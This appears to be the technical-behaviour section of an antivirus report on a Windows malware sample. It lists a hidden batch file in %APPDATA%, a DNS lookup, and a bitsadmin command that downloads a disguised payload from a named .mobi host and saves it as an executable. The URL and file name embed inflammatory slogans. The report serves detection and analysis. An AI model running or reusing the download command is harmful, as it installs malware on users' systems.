Technical Information
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\shdgeuyosnd.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1908
- %APPDATA%\shdgeuyosnd.bat
- nul
- %TEMP%\1017984.cvr
- DNS ASK ma##.###efonguncelleme.mobi
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\shdgeuyosnd.bat' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority high http://mail.telefonguncelleme.mobi/www.microsoft.com/israel_like_naziSS_free_gaza/c30013.jpg "%APPDATA%\naziSS_equalISRAEL_freegaza.exe"